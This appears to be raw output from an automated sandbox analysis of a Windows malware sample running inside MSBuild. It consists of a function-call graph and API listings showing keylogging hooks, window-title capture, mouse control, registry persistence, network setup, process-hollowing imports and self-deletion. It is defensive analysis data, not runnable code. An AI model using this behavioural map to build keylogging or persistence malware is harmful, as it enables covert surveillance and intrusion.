47102->47090 47104 403b40 28 API calls 47103->47104 47105 41a7f1 47104->47105 47495 403cbb 47105->47495 47107 41a7fd 47108 4028cf 28 API calls 47107->47108 47109 41a807 47108->47109 47110 401e13 26 API calls 47109->47110 47111 41a810 47110->47111 47112 401e13 26 API calls 47111->47112 47113 40dfc3 47112->47113 47113->46937 47115 40e08b 47114->47115 47116 41248f RegQueryValueExA RegCloseKey 47114->47116 47115->46966 47115->46969 47116->47115 47118 4125b0 RegQueryValueExW RegCloseKey 47117->47118 47119 4125dd 47117->47119 47118->47119 47120 403b40 28 API calls 47119->47120 47121 40e0ba 47120->47121 47121->46978 47123 412992 RegDeleteValueW 47122->47123 47124 40e117 47122->47124 47123->47124 47124->46988 47126 40cbc5 47125->47126 47127 41246e 3 API calls 47126->47127 47128 40cbcc 47127->47128 47132 40cbeb 47128->47132 47509 401602 47128->47509 47130 40cbd9 47512 4127d5 RegCreateKeyA 47130->47512 47133 413fd4 47132->47133 47134 413feb 47133->47134 47529 41aa73 47134->47529 47136 413ff6 47137 401d64 28 API calls 47136->47137 47138 41400f 47137->47138 47139 43a5e7 42 API calls 47138->47139 47140 41401c 47139->47140 47141 414021 Sleep 47140->47141 47142 41402e 47140->47142 47141->47142 47143 401f66 28 API calls 47142->47143 47144 41403d 47143->47144 47145 401d64 28 API calls 47144->47145 47146 41404b 47145->47146 47147 401fbd 28 API calls 47146->47147 47148 414053 47147->47148 47149 41afc3 28 API calls 47148->47149 47150 41405b 47149->47150 47533 404262 WSAStartup 47150->47533 47152 414065 47153 401d64 28 API calls 47152->47153 47154 41406e 47153->47154 47155 401d64 28 API calls 47154->47155 47216 4140ed 47154->47216 47156 414087 47155->47156 47157 401d64 28 API calls 47156->47157 47158 414098 47157->47158 47160 401d64 28 API calls 47158->47160 47159 41afc3 28 API calls 47159->47216 47161 4140a9 47160->47161 47162 401d64 28 API calls 47161->47162 47164 4140ba 47162->47164 47163 4085b4 28 API calls 47163->47216 47166 401d64 28 API calls 47164->47166 47165 401eef 26 API calls 47165->47216 47167 4140cb 47166->47167 47168 401d64 28 API calls 47167->47168 47169 4140dd 47168->47169 47557 404101 87 API calls 47169->47557 47171 401f66 28 API calls 47171->47216 47172 41a686 79 API calls 47172->47216 47174 414244 WSAGetLastError 47558 41bc76 30 API calls 47174->47558 47175 4041f1 3 API calls 47175->47216 47178 404915 104 API calls 47178->47216 47179 401f66 28 API calls 47180 414259 47179->47180 47180->47179 47182 41a686 79 API calls 47180->47182 47185 401d64 28 API calls 47180->47185 47186 401d8c 26 API calls 47180->47186 47188 43a5e7 42 API calls 47180->47188 47180->47216 47218 414b22 CreateThread 47180->47218 47219 401eea 26 API calls 47180->47219 47220 401e13 26 API calls 47180->47220 47559 404c9e 28 API calls 47180->47559 47560 40a767 84 API calls 47180->47560 47561 4047eb 98 API calls 47180->47561 47181 40428c 96 API calls 47181->47216 47182->47180 47184 404cbf 28 API calls 47184->47216 47185->47180 47186->47180 47187 405ce6 28 API calls 47187->47216 47189 414b80 Sleep 47188->47189 47189->47180 47192 4082dc 28 API calls 47192->47216 47193 440c51 26 API calls 47193->47216 47194 401d64 28 API calls 47194->47216 47195 401fbd 28 API calls 47195->47216 47196 41265d 3 API calls 47196->47216 47197 412513 31 API calls 47197->47216 47198 403b40 28 API calls 47198->47216 47201 401d64 28 API calls 47202 4144ed GetTickCount 47201->47202 47203 41ad46 28 API calls 47202->47203 47203->47216 47204 41aca0 GetTickCount 47204->47216 47205 41ad46 28 API calls 47205->47216 47206 41ac52 30 API calls 47206->47216 47207 41aec8 28 API calls 47207->47216 47209 4027ec 28 API calls 47209->47216 47210 4027cb 28 API calls 47210->47216 47211 40275c 28 API calls 47211->47216 47212 404468 60 API calls 47212->47216 47213 401eea 26 API calls 47213->47216 47214 401e13 26 API calls 47214->47216 47215 4045d5 181 API calls 47215->47216 47216->47159 47216->47163 47216->47165 47216->47171 47216->47172 47216->47174 47216->47175 47216->47178 47216->47180 47216->47181 47216->47184 47216->47187 47216->47192 47216->47193 47216->47194 47216->47195 47216->47196 47216->47197 47216->47198 47216->47201 47216->47204 47216->47205 47216->47206 47216->47207 47216->47209 47216->47210 47216->47211 47216->47212 47216->47213 47216->47214 47216->47215 47534 413f9a 47216->47534 47539 41a96d 47216->47539 47542 413683 47216->47542 47545 40cbf1 47216->47545 47551 41adee 47216->47551 47554 40e679 GetLocaleInfoA 47216->47554 47218->47180 47605 419e89 103 API calls 47218->47605 47219->47180 47220->47180 47221->46737 47222->46746 47225 4085c0 47224->47225 47226 402e78 28 API calls 47225->47226 47227 4085e4 47226->47227 47227->46768 47229 4124e1 RegQueryValueExA RegCloseKey 47228->47229 47230 41250b 47228->47230 47229->47230 47230->46764 47231->46771 47232->46800 47233->46794 47234->46784 47235->46798 47237 40c8ba 47236->47237 47238 40c8da 47237->47238 47239 40c90f 47237->47239 47243 40c8d0 47237->47243 47606 41a74b 29 API calls 47238->47606 47242 41b15b GetCurrentProcess 47239->47242 47241 40ca03 GetLongPathNameW 47245 403b40 28 API calls 47241->47245 47246 40c914 47242->47246 47243->47241 47244 40c8e3 47247 401e18 26 API calls 47244->47247 47248 40ca18 47245->47248 47249 40c918 47246->47249 47250 40c96a 47246->47250 47288 40c8ed 47247->47288 47252 403b40 28 API calls 47248->47252 47251 403b40 28 API calls 47249->47251 47253 403b40 28 API calls 47250->47253 47255 40c926 47251->47255 47256 40ca27 47252->47256 47254 40c978 47253->47254 47261 403b40 28 API calls 47254->47261 47262 403b40 28 API calls 47255->47262 47609 40cc37 28 API calls 47256->47609 47257 401e13 26 API calls 47257->47243 47259 40ca3a 47610 402860 28 API calls 47259->47610 47264 40c98e 47261->47264 47265 40c93c 47262->47265 47263 40ca45 47611 402860 28 API calls 47263->47611 47608 402860 28 API calls 47264->47608 47607 402860 28 API calls 47265->47607 47269 40ca4f 47272 401e13 26 API calls 47269->47272 47270 40c999 47273 401e18 26 API calls 47270->47273 47271 40c947 47274 401e18 26 API calls 47271->47274 47275 40ca59 47272->47275 47276 40c9a4 47273->47276 47277 40c952 47274->47277 47278 401e13 26 API calls 47275->47278 47279 401e13 26 API calls 47276->47279 47280 401e13 26 API calls 47277->47280 47281 40ca62 47278->47281 47282 40c9ad 47279->47282 47283 40c95b 47280->47283 47284 401e13 26 API calls 47281->47284 47285 401e13 26 API calls 47282->47285 47286 401e13 26 API calls 47283->47286 47287 40ca6b 47284->47287 47285->47288 47286->47288 47289 401e13 26 API calls 47287->47289 47288->47257 47290 40ca74 47289->47290 47291 401e13 26 API calls 47290->47291 47292 40ca7d 47291->47292 47292->46846 47293->46858 47294->46879 47296 412683 RegQueryValueExA RegCloseKey 47295->47296 47297 4126a7 47295->47297 47296->47297 47297->46839 47298->46872 47299->46908 47300->46918 47301->46942 47302->46930 47303->46963 47305 401e0c 47304->47305 47306->46791 47309 40e183 47308->47309 47310 41a65c LoadResource LockResource SizeofResource 47308->47310 47309->47018 47310->47309 47312 401f86 28 API calls 47311->47312 47313 406066 47312->47313 47313->47029 47314->47033 47316 401e94 47315->47316 47318 41a471 47317->47318 47319 41b168 GetCurrentProcess 47317->47319 47320 412513 RegOpenKeyExA 47318->47320 47319->47318 47321 412541 RegQueryValueExA RegCloseKey 47320->47321 47322 412569 47320->47322 47321->47322 47323 401f66 28 API calls 47322->47323 47324 41257e 47323->47324 47324->47042 47325->47050 47327 40b02f 47326->47327 47330 40b04b 47327->47330 47329 40b045 47329->47061 47331 40b055 47330->47331 47333 40b060 47331->47333 47334 40b138 28 API calls 47331->47334 47333->47329 47334->47333 47336 409855 47335->47336 47337 4124b7 3 API calls 47336->47337 47338 40985c 47337->47338 47339 409870 47338->47339 47340 40988a 47338->47340 47341 4095cf 47339->47341 47342 409875 47339->47342 47351 4082dc 47340->47351 47341->46903 47344 4082dc 28 API calls 47342->47344 47346 409883 47344->47346 47377 409959 29 API calls 47346->47377 47349 409888 47349->47341 47350->47095 47352 4082eb 47351->47352 47378 408431 47352->47378 47354 408309 47355 4098a5 47354->47355 47383 40affa 47355->47383 47358 4098f6 47360 401f66 28 API calls 47358->47360 47359 4098ce 47361 401f66 28 API calls 47359->47361 47362 409901 47360->47362 47363 4098d8 47361->47363 47364 401f66 28 API calls 47362->47364 47365 41ae08 28 API calls 47363->47365 47366 409910 47364->47366 47367 4098e6 47365->47367 47369 41a686 79 API calls 47366->47369 47387 40a876 31 API calls ___crtLCMapStringA 47367->47387 47371 409915 CreateThread 47369->47371 47370 4098ed 47372 401eea 26 API calls 47370->47372 47373 409930 CreateThread 47371->47373 47374 40993c CreateThread 47371->47374 47394 4099a9 47371->47394 47372->47358 47373->47374 47391 409993 47373->47391 47375 401e13 26 API calls 47374->47375 47388 4099b5 47374->47388 47376 409950 47375->47376 47376->47341 47377->47349 47494 40999f 135 API calls 47377->47494 47379 40843d 47378->47379 47381 40845b 47379->47381 47382 402f0d 28 API calls 47379->47382 47381->47354 47382->47381 47385 40b006 47383->47385 47384 4098c3 47384->47358 47384->47359 47385->47384 47386 403b9e 28 API calls 47385->47386 47386->47384 47387->47370 47397 40a3f4 47388->47397 47434 4099e4 47391->47434 47450 409e48 47394->47450 47403 40a402 47397->47403 47398 4099be 47399 40a45c Sleep GetForegroundWindow GetWindowTextLengthW 47400 40b027 28 API calls 47399->47400 47400->47403 47403->47398 47403->47399 47405 40a4a2 GetWindowTextW 47403->47405 47407 40a5ff 47403->47407 47408 41aca0 GetTickCount 47403->47408 47409 40affa 28 API calls 47403->47409 47411 40a569 Sleep 47403->47411 47412 440c51 26 API calls 47403->47412 47414 401f66 28 API calls 47403->47414 47418 405ce6 28 API calls 47403->47418 47420 4028cf 28 API calls 47403->47420 47421 40a4f1 47403->47421 47422 41ae08 28 API calls 47403->47422 47423 409d58 27 API calls 47403->47423 47424 401e13 26 API calls 47403->47424 47425 401eea 26 API calls 47403->47425 47426 433519 5 API calls __Init_thread_wait 47403->47426 47427 4338a5 29 API calls __onexit 47403->47427 47428 4334cf EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 47403->47428 47429 4082a8 28 API calls 47403->47429 47431 40b0dd 28 API calls 47403->47431 47432 40ae58 44 API calls 2 library calls 47403->47432 47433 404c9e 28 API calls 47403->47433 47405->47403 47410 401e13 26 API calls 47407->47410 47408->47403 47409->47403 47410->47398 47411->47403 47412->47403 47414->47403 47415 4082dc 28 API calls 47415->47421 47418->47403 47420->47403 47421->47403 47421->47415 47430 40a876 31 API calls ___crtLCMapStringA 47421->47430 47422->47403 47423->47403 47424->47403 47425->47403 47426->47403 47427->47403 47428->47403 47429->47403 47430->47421 47431->47403 47432->47403 47433->47403 47435 409a63 GetMessageA 47434->47435 47436 4099ff GetModuleHandleA SetWindowsHookExA 47434->47436 47437 409a75 TranslateMessage DispatchMessageA 47435->47437 47440 40999c 47435->47440 47436->47435 47438 409a1b GetLastError 47436->47438 47437->47435 47437->47440 47439 41ad46 28 API calls 47438->47439 47441 409a31 47439->47441 47449 404c9e 28 API calls 47441->47449 47443 409a3e 47444 401f66 28 API calls 47443->47444 47445 409a4d 47444->47445 47446 41a686 79 API calls 47445->47446 47447 409a52 47446->47447 47448 401eea 26 API calls 47447->47448 47448->47440 47449->47443 47451 409e5d Sleep 47450->47451 47470 409d97 47451->47470 47453 4099b2 47454 409eae GetFileAttributesW 47458 409e6f 47454->47458 47455 409e9d CreateDirectoryW 47455->47458 47456 409ec5 SetFileAttributesW 47456->47458 47458->47451 47458->47453 47458->47454 47458->47455 47458->47456 47460 401d64 28 API calls 47458->47460 47468 409f10 47458->47468 47482 41b58f 47458->47482 47459 409f3f PathFileExistsW 47459->47468 47460->47458 47462 401f86 28 API calls 47462->47468 47463 40a048 SetFileAttributesW 47463->47458 47464 406052 28 API calls 47464->47468 47465 401eef 26 API calls 47465->47468 47466 401eea 26 API calls 47466->47468 47468->47459 47468->47462 47468->47463 47468->47464 47468->47465 47468->47466 47469 401eea 26 API calls 47468->47469 47491 41b61a 32 API calls 47468->47491 47492 41b687 CreateFileW SetFilePointer WriteFile CloseHandle 47468->47492 47469->47458 47471 409e44 47470->47471 47476 409dad 47470->47476 47471->47458 47472 409dcc CreateFileW 47473 409dda GetFileSize 47472->47473 47472->47476 47474 409e0f CloseHandle 47473->47474 47473->47476 47474->47476 47475 409e21 47475->47471 47479 4082dc 28 API calls 47475->47479 47476->47472 47476->47474 47476->47475 47477 409e04 Sleep 47476->47477 47493 40a7f0 83 API calls 47476->47493 47477->47474 47480 409e3d 47479->47480 47481 4098a5 126 API calls 47480->47481 47481->47471 47483 41b5a2 CreateFileW 47482->47483 47485 41b5db 47483->47485 47486 41b5df 47483->47486 47485->47458 47487 41b5f6 WriteFile 47486->47487 47488 41b5e6 SetFilePointer 47486->47488 47489 41b60b CloseHandle 47487->47489 47490 41b609 47487->47490 47488->47487 47488->47489 47489->47485 47490->47489 47491->47468 47492->47468 47493->47477 47498 403dc2 47495->47498 47497 403cc9 47497->47107 47499 403dce 47498->47499 47502 402ffd 47499->47502 47501 403de3 47501->47497 47503 40300e 47502->47503 47504 4032a4 28 API calls 47503->47504 47505 40301a 47504->47505 47507 40302e 47505->47507 47508 4035e8 28 API calls 47505->47508 47507->47501 47508->47507 47515 4395ba 47509->47515 47513 412814 47512->47513 47514 4127ed RegSetValueExA RegCloseKey 47512->47514 47513->47132 47514->47513 47518 43953b 47515->47518 47517 401608 47517->47130 47519 43954a 47518->47519 47520 43955e 47518->47520 47526 445354 20 API calls __dosmaperr 47519->47526 47524 43955a __alldvrm 47520->47524 47528 447601 11 API calls 2 library calls 47520->47528 47523 43954f 47527 43a827 26 API calls _Deallocate 47523->47527 47524->47517 47526->47523 47527->47524 47528->47524 47532 41aab9 _Yarn ___scrt_fastfail 47529->47532 47530 401f66 28 API calls 47531 41ab2e 47530->47531 47531->47136 47532->47530 47533->47152 47535 413fb3 getaddrinfo WSASetLastError 47534->47535 47536 413fa9 47534->47536 47535->47216 47562 413e37 35 API calls ___std_exception_copy 47536->47562 47538 413fae 47538->47535 47563 41a945 GlobalMemoryStatusEx 47539->47563 47541 41a982 47541->47216 47564 413646 47542->47564 47546 40cc0d 47545->47546 47547 41246e 3 API calls 47546->47547 47549 40cc14 47547->47549 47548 40cc2c 47548->47216 47549->47548 47550 4124b7 3 API calls 47549->47550 47550->47548 47552 401f86 28 API calls 47551->47552 47553 41ae03 47552->47553 47553->47216 47555 401f66 28 API calls 47554->47555 47556 40e69e 47555->47556 47556->47216 47557->47216 47558->47180 47559->47180 47560->47180 47561->47180 47562->47538 47563->47541 47567 413619 47564->47567 47568 41362e ___scrt_initialize_default_local_stdio_options 47567->47568 47571 43e2dd 47568->47571 47574 43b030 47571->47574 47575 43b070 47574->47575 47576 43b058 47574->47576 47575->47576 47577 43b078 47575->47577 47598 445354 20 API calls __dosmaperr 47576->47598 47600 4392de 38 API calls 2 library calls 47577->47600 47580 43b05d 47599 43a827 26 API calls _Deallocate 47580->47599 47581 43b088 47601 43b7b6 20 API calls 2 library calls 47581->47601 47583 43b068 47591 433d2c 47583->47591 47586 41363c 47586->47216 47587 43b100 47602 43be24 50 API calls 3 library calls 47587->47602 47590 43b10b 47603 43b820 20 API calls _free 47590->47603 47592 433d37 IsProcessorFeaturePresent 47591->47592 47593 433d35 47591->47593 47595 4341a4 47592->47595 47593->47586 47604 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 47595->47604 47597 434287 47597->47586 47598->47580 47599->47583 47600->47581 47601->47587 47602->47590 47603->47583 47604->47597 47606->47244 47607->47271 47608->47270 47609->47259 47610->47263 47611->47269 47617 40e56a 47612->47617 47613 4124b7 3 API calls 47613->47617 47614 40e60e 47616 4082dc 28 API calls 47614->47616 47615 4082dc 28 API calls 47634 40e5a1 47615->47634 47620 40e619 47616->47620 47617->47613 47617->47614 47618 40e5fe Sleep 47617->47618 47617->47634 47645 40bf04 47617->47645 47618->47617 47619 41ae08 28 API calls 47619->47634 47622 41ae08 28 API calls 47620->47622 47623 40e625 47622->47623 47733 412774 29 API calls 47623->47733 47626 401e13 26 API calls 47626->47634 47627 40e638 47628 401e13 26 API calls 47627->47628 47630 40e644 47628->47630 47629 401f66 28 API calls 47629->47634 47631 401f66 28 API calls 47630->47631 47632 40e655 47631->47632 47635 4126d2 29 API calls 47632->47635 47633 4126d2 29 API calls 47633->47634 47634->47615 47634->47618 47634->47619 47634->47626 47634->47629 47634->47633 47732 412774 29 API calls 47634->47732 47636 40e668 47635->47636 47734 411699 TerminateProcess WaitForSingleObject 47636->47734 47638 40e670 ExitProcess 47800 411637 61 API calls 47640->47800 47735 411699 TerminateProcess WaitForSingleObject 47645->47735 47647 40bf13 47648 40bf26 47647->47648 47736 40afba TerminateThread 47647->47736 47650 40bf36 47648->47650 47757 418c08 9 API calls 47648->47757 47652 40bf3f 47650->47652 47654 40bf50 47650->47654 47758 41b42f 9 API calls 47652->47758 47655 40bf76 47654->47655 47656 41297a 2 API calls 47654->47656 47657 41297a 2 API calls 47655->47657 47658 40bf95 47655->47658 47656->47655 47657->47658 47659 41297a 2 API calls 47658->47659 47660 40bfb2 ___scrt_fastfail 47658->47660 47659->47660 47661 41265d 3 API calls 47660->47661 47662 40c002 47661->47662 47663 40c019 47662->47663 47664 40c009 GetModuleFileNameW 47662->47664 47665 40c020 RegDeleteKeyA 47663->47665 47664->47663 47666 40c03f 47665->47666 47667 40c058 SetFileAttributesW 47666->47667 47668 40c049 47666->47668 47743 41ab38 47667->47743 47670 40c055 SetFileAttributesW 47668->47670 47670->47667 47672 41ae08 28 API calls 47673 40c086 47672->47673 47674 4028cf 28 API calls 47673->47674 47675 40c094 47674->47675 47676 401e13 26 API calls 47675->47676 47677 40c09e 47676->47677 47678 401eea 26 API calls 47677->47678 47679 40c0a7 47678->47679 47680 403b40 28 API calls 47679->47680 47681 40c0c9 47680->47681 47682 4028cf 28 API calls 47681->47682 47683 40c0d4 47682->47683 47754 403cdc 47683->47754 47685 40c0e0 47686 401e13 26 API calls 47685->47686 47687 40c0ea 47686->47687 47688 401e13 26 API calls 47687->47688 47689 40c0f3 47688->47689 47690 403b40 28 API calls 47689->47690 47691 40c101 47690->47691 47692 403cbb 28 API calls 47691->47692 47693 40c110 47692->47693 47694 401e13 26 API calls 47693->47694 47695 40c11a 47694->47695 47696 40c176 47695->47696 47698 403b40 28 API calls 47695->47698 47697 403b40 28 API calls 47696->47697 47700 40c191 47697->47700 47699 40c135 47698->47699 47701 403cbb 28 API calls 47699->47701 47702 4028cf 28 API calls 47700->47702 47704 40c144 47701->47704 47703 40c19c 47702->47703 47705 4028cf 28 API calls 47703->47705 47706 4028cf 28 API calls 47704->47706 47707 40c1a8 47705->47707 47708 40c150 47706->47708 47709 401e13 26 API calls 47707->47709 47710 401e13 26 API calls 47708->47710 47711 40c1bc 47709->47711 47712 40c164 47710->47712 47713 401e13 26 API calls 47711->47713 47714 401e13 26 API calls 47712->47714 47715 40c1c5 47713->47715 47716 40c16d 47714->47716 47717 401e13 26 API calls 47715->47717 47718 401e13 26 API calls 47716->47718 47719 40c1ce 47717->47719 47718->47696 47724 40c22f 47719->47724 47759 40b0dd 28 API calls 47719->47759 47721 40c206 47722 4028cf 28 API calls 47721->47722 47723 40c212 47722->47723 47725 401e13 26 API calls 47723->47725 47727 41b58f 4 API calls 47724->47727 47726 40c226 47725->47726 47728 401e13 26 API calls 47726->47728 47729 40c267 47727->47729 47728->47724 47730 40c286 ExitProcess 47729->47730 47731 40c279 ShellExecuteW 47729->47731 47731->47730 47732->47634 47733->47627 47734->47638 47735->47647 47737 40afd3 UnhookWindowsHookEx TerminateThread 47736->47737 47738 40af77 47736->47738 47737->47738 47739 40af83 DeleteFileW 47738->47739 47741 40af9f 47739->47741 47740 40afb5 47740->47648 47741->47740 47742 40afae RemoveDirectoryW 47741->47742 47742->47740 47744 41ab48 47743->47744 47760 41a45a 47744->47760 47750 40c07b 47750->47672 47751 440a1a 38 API calls 47753 41ab7f 47751->47753 47753->47750 47753->47751 47769 41c188 28 API calls 47753->47769 47796 402daf 47754->47796 47756 403cea 47756->47685 47757->47650 47758->47654 47759->47721 47761 4395ba 27 API calls 47760->47761 47762 41a461 GetCurrentProcessId 47761->47762 47763 440a3b 47762->47763 47770 446ebf GetLastError 47763->47770 47765 41ab73 47766 440a1a 47765->47766 47767 446ebf __Getctype 38 API calls 47766->47767 47768 440a1f 47767->47768 47768->47753 47769->47753 47771 446ed5 47770->47771 47772 446ee1 47770->47772 47791 447466 11 API calls 2 library calls 47771->47791 47792 448706 20 API calls 3 library calls 47772->47792 47775 446edb 47775->47772 47778 446f2a SetLastError 47775->47778 47776 446eed 47777 446ef5 47776->47777 47793 4474bc 11 API calls 2 library calls 47776->47793 47780 446ac5 _free 20 API calls 47777->47780 47778->47765 47782 446efb 47780->47782 47781 446f0a 47781->47777 47783 446f11 47781->47783 47784 446f36 SetLastError 47782->47784 47794 446d31 20 API calls __dosmaperr 47783->47794 47795 4453b6 38 API calls _Atexit 47784->47795 47786 446f1c 47789 446ac5 _free 20 API calls 47786->47789 47790 446f23 47789->47790 47790->47778 47790->47784 47791->47775 47792->47776 47793->47781 47794->47786 47797 402dbb 47796->47797 47798 4030f7 28 API calls 47797->47798 47799 402dcd 47798->47799 47799->47756

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BCF8
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD01
                                                                                                • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD18
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD1B
                                                                                                • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD2D
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD30
                                                                                                • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD41
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD44
                                                                                                • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD55
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD58
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD65
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD75
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD85
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                                                                                                • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BD99
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BD9C
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDA9
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDBD
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDC0
                                                                                                • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDD1
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDD4
                                                                                                • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDE5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDE8
                                                                                                • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BDF5
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                                                                                                • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE06
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE09
                                                                                                • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE16
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE2B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE2E
                                                                                                • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE3B
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE50
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE53
                                                                                                • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE60
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                                                                                                • API String ID: 384173800-625181639
                                                                                                • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                • Instruction ID: 894fbade80705e672e772900be83df88f70523cf1842e1027a1ce5ee2e2841b6
                                                                                                • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                                                                                                • Instruction Fuzzy Hash: 2831EDA0E4031C7ADA107FB69C49E5B7E9CD944B953110827B508D3162FBBDA9809EEE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1467 418754-418780 call 404bb1 call 403b60 1472 418782-4187b1 call 404bb1 * 3 1467->1472 1473 4187b6-4187b9 1467->1473 1508 41897f-418992 call 417a88 1472->1508 1474 418816-418819 1473->1474 1475 4187bb-418811 call 404bb1 * 4 call 418abe 1473->1475 1477 418876-418879 1474->1477 1478 41881b-418874 call 404bb1 * 4 call 4185d7 call 4189b0 1474->1478 1543 4188d4-4188d5 1475->1543 1483 41887b-4188cf call 404bb1 * 4 call 4185d7 call 418a11 1477->1483 1484 4188da-4188dd 1477->1484 1478->1543 1483->1543 1489 41892b-41892e 1484->1489 1490 4188df-418929 call 404bb1 * 3 call 4185d7 call 418a72 1484->1490 1496 418930-418933 1489->1496 1497 418935-418938 1489->1497 1511 418997-4189af call 401eea * 2 1490->1511 1503 41893d-41894a mouse_event 1496->1503 1504 41893a-41893b 1497->1504 1505 41894c-41894f 1497->1505 1503->1511 1504->1503 1505->1511 1512 418951-41897a call 404bb1 * 3 1505->1512 1508->1511 1512->1508 1543->1511
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 0$1$2$3$4$5$6$7
                                                                                                • API String ID: 0-3177665633
                                                                                                • Opcode ID: 68e9d817cbe434b414e4c0598ca2ad9f35c3e0d7e388fcdaa09fa35b29c3df5c
                                                                                                • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                • Opcode Fuzzy Hash: 68e9d817cbe434b414e4c0598ca2ad9f35c3e0d7e388fcdaa09fa35b29c3df5c
                                                                                                • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1551 4099e4-4099fd 1552 409a63-409a73 GetMessageA 1551->1552 1553 4099ff-409a19 GetModuleHandleA SetWindowsHookExA 1551->1553 1554 409a75-409a8d TranslateMessage DispatchMessageA 1552->1554 1555 409a8f 1552->1555 1553->1552 1556 409a1b-409a61 GetLastError call 41ad46 call 404c9e call 401f66 call 41a686 call 401eea 1553->1556 1554->1552 1554->1555 1558 409a91-409a96 1555->1558 1556->1558
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
